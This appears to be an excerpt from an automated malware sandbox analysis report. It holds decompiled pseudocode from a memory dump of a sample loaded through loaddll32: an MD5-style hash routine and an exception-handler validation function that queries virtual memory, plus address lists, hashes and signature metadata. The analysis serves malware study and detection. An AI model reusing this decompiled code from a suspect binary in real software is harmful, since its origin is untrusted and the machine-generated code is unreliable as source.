				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                0x00d48371
                                0x00d4837c
                                0x00d4837f
                                0x00d48382
                                0x00d48383
                                0x00d483a1
                                0x00d483a3
                                0x00d483a6
                                0x00d483a9
                                0x00d483a9
                                0x00d483ac
                                0x00d483ac
                                0x00d483af
                                0x00d483af
                                0x00d483b2
                                0x00d483b2
                                0x00d483cf
                                0x00d483d2
                                0x00d483e8
                                0x00d483eb
                                0x00d48405
                                0x00d48408
                                0x00d4841e
                                0x00d48421
                                0x00d48423
                                0x00d4843b
                                0x00d4843e
                                0x00d48441
                                0x00d48459
                                0x00d4845c
                                0x00d48476
                                0x00d48479
                                0x00d4848f
                                0x00d48492
                                0x00d48494
                                0x00d484ac
                                0x00d484b1
                                0x00d484b4
                                0x00d484ca
                                0x00d484cd
                                0x00d484e7
                                0x00d484ea
                                0x00d48500
                                0x00d48503
                                0x00d48505
                                0x00d48520
                                0x00d48523
                                0x00d4853a
                                0x00d4853d
                                0x00d48541
                                0x00d4855a
                                0x00d4855d
                                0x00d4855f
                                0x00d48562
                                0x00d4857d
                                0x00d48580
                                0x00d48599
                                0x00d4859c
                                0x00d485ac
                                0x00d485af
                                0x00d485c7
                                0x00d485ca
                                0x00d485e4
                                0x00d485e7
                                0x00d485ff
                                0x00d48602
                                0x00d48618
                                0x00d4861b
                                0x00d48633
                                0x00d48636
                                0x00d4864e
                                0x00d48651
                                0x00d4866b
                                0x00d4866e
                                0x00d48684
                                0x00d48687
                                0x00d4869f
                                0x00d486a2
                                0x00d486bc
                                0x00d486bf
                                0x00d486d7
                                0x00d486da
                                0x00d486f0
                                0x00d486f3
                                0x00d4870b
                                0x00d4870e
                                0x00d48726
                                0x00d48729
                                0x00d4873b
                                0x00d4873e
                                0x00d48750
                                0x00d48753
                                0x00d48765
                                0x00d48768
                                0x00d4876c
                                0x00d4877c
                                0x00d4877f
                                0x00d4878d
                                0x00d48790
                                0x00d487a2
                                0x00d487a5
                                0x00d487b9
                                0x00d487bc
                                0x00d487be
                                0x00d487ce
                                0x00d487d1
                                0x00d487e3
                                0x00d487e6
                                0x00d487f4
                                0x00d487f7
                                0x00d48809
                                0x00d4880c
                                0x00d48810
                                0x00d48820
                                0x00d48823
                                0x00d48835
                                0x00d48838
                                0x00d48846
                                0x00d48849
                                0x00d4885b
                                0x00d4885e
                                0x00d48870
                                0x00d48873
                                0x00d48887
                                0x00d4888a
                                0x00d4889e
                                0x00d488a1
                                0x00d488b5
                                0x00d488b8
                                0x00d488cc
                                0x00d488cf
                                0x00d488e3
                                0x00d488e6
                                0x00d488fa
                                0x00d488ff
                                0x00d48911
                                0x00d48914
                                0x00d48928
                                0x00d4892b
                                0x00d4893f
                                0x00d48942
                                0x00d48958
                                0x00d4895b
                                0x00d4896f
                                0x00d48972
                                0x00d48984
                                0x00d48987
                                0x00d4899b
                                0x00d4899e
                                0x00d489b2
                                0x00d489b5
                                0x00d489c9
                                0x00d489d2
                                0x00d489d5
                                0x00d489de
                                0x00d489e7
                                0x00d489ef
                                0x00d489f7
                                0x00d48a01
                                0x00d48a16

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
                                • Instruction ID: bbb51d1a3f9e4e86f9f79b7ad5bec3b6228a0936e6ac431938a8f1778228e00a
                                • Opcode Fuzzy Hash: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
                                • Instruction Fuzzy Hash: DE22847BE516169BDB08CA95CC805E9B3E3BBC832471F9139C919E3305EE797A0786D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 100023D5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E100023D5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                0x100023df
                                0x100023e2
                                0x100023e8
                                0x10002406
                                0x00000000
                                0x10002406
                                0x100023f0
                                0x100023f9
                                0x100023ff
                                0x1000240e
                                0x10002411
                                0x10002414
                                0x1000241e
                                0x1000241e
                                0x10002420
                                0x10002423
                                0x10002425
                                0x10002425
                                0x10002427
                                0x1000242a
                                0x00000000
                                0x00000000
                                0x1000242c
                                0x1000242e
                                0x10002494
                                0x10002494
                                0x100025f2
                                0x00000000
                                0x100025f2
                                0x10002430
                                0x10002430
                                0x10002434
                                0x10002436
                                0x10002436
                                0x10002436
                                0x10002436
                                0x10002439
                                0x1000243a
                                0x1000243d
                                0x1000243d
                                0x10002441
                                0x10002445
                                0x10002453
                                0x10002453
                                0x1000245b
                                0x10002461
                                0x10002463
                                0x10002465
                                0x10002475
                                0x10002482
                                0x10002486
                                0x1000248b
                                0x1000248d
                                0x1000250b
                                0x1000250b
                                0x1000248f
                                0x1000248f
                                0x1000248f
                                0x1000250d
                                0x1000250f
                                0x100025f0
                                0x100025f0
                                0x00000000
                                0x10002515
                                0x10002515
                                0x1000251c
                                0x00000000
                                0x00000000
                                0x10002522
                                0x10002526
                                0x10002582
                                0x10002584
                                0x1000258c
                                0x1000258e
                                0x10002590
                                0x00000000
                                0x00000000
                                0x10002592
                                0x10002598
                                0x1000259a
                                0x1000259c
                                0x100025b1
                                0x100025b1
                                0x100025b3
                                0x100025e2
                                0x100025e9
                                0x00000000
                                0x100025e9
                                0x100025b7
                                0x100025b8
                                0x100025ba
                                0x100025bc
                                0x100025bc
                                0x100025be
                                0x100025c0
                                0x100025c2
                                0x100025d6
                                0x100025d6
                                0x100025d9
                                0x100025db
                                0x100025db
                                0x100025dc
                                0x100025dc
                                0x00000000
                                0x100025c4
                                0x100025c4
                                0x100025c4
                                0x100025cd
                                0x100025ce
                                0x100025d0
                                0x100025d2
                                0x100025d2
                                0x00000000
                                0x100025c4
                                0x100025c2
                                0x1000259e
                                0x100025a5
                                0x100025a5
                                0x100025a7
                                0x00000000
                                0x00000000
                                0x100025a9
                                0x100025aa
                                0x100025ad
                                0x100025af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100025af
                                0x00000000
                                0x100025a5
                                0x10002528
                                0x1000252b
                                0x10002530
                                0x00000000
                                0x00000000
                                0x10002539
                                0x1000253b
                                0x10002541
                                0x00000000
                                0x00000000
                                0x10002547
                                0x1000254d
                                0x00000000
                                0x00000000
                                0x10002553
                                0x10002555
                                0x1000255e
                                0x10002562
                                0x00000000
                                0x00000000
                                0x10002568
                                0x1000256b
                                0x1000256d
                                0x00000000
                                0x00000000
                                0x10002574
                                0x10002576
                                0x00000000
                                0x00000000
                                0x10002578
                                0x1000257c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x1000257c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10002467
                                0x10002467
                                0x10002467
                                0x1000246e
                                0x00000000
                                0x00000000
                                0x10002470
                                0x10002471
                                0x10002473
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10002473
                                0x1000249b
                                0x1000249d
                                0x00000000
                                0x00000000
                                0x100024ad
                                0x100024af
                                0x100024b1
                                0x00000000
                                0x00000000
                                0x100024b7
                                0x100024be
                                0x100024ea
                                0x100024ea
                                0x100024ec
                                0x100024ee
                                0x10002502
                                0x10002504
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024f0
                                0x100024f0
                                0x100024f0
                                0x100024f9
                                0x100024fa
                                0x100024fc
                                0x100024fe
                                0x100024fe
                                0x00000000
                                0x100024f0
                                0x100024c0
                                0x100024c3
                                0x100024c5
                                0x100024d7
                                0x100024d7
                                0x100024da
                                0x100024dc
                                0x100024dc
                                0x100024dd
                                0x100024dd
                                0x100024e3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024c7
                                0x100024c7
                                0x100024c7
                                0x100024ce
                                0x00000000
                                0x00000000
                                0x100024d0
                                0x100024d0
                                0x100024d1
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024d1
                                0x100024d3
                                0x100024d5
                                0x100024e8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024e8
                                0x00000000
                                0x100024d5
                                0x10002447
                                0x1000244a
                                0x1000244d
                                0x00000000
                                0x00000000
                                0x1000244f
                                0x10002451
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10002451
                                0x10002416
                                0x10002418
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002486
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: 5db45c4fd72d134e93b61a80d76a2a1d455f1c0aa0ea9f8bb30746c73eec9294
                                • Instruction ID: f35057221c5491e74c9434013e617d5b9a1dbcad0d33e4fc59ed5e506bc34830
                                • Opcode Fuzzy Hash: 5db45c4fd72d134e93b61a80d76a2a1d455f1c0aa0ea9f8bb30746c73eec9294
                                • Instruction Fuzzy Hash: C661FF70A00A529FFB59CF28CDE065937E5FB883D5F268039D806C729DEB30DC828654
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4B1E5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D4B1E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xd4d2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xd4d328 = 1;
										__eflags =  *0xd4d328;
										if( *0xd4d328 != 0) {
											goto L60;
										}
										_t84 =  *0xd4d2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xd4d328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xd4d2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xd4d2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xd4d2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
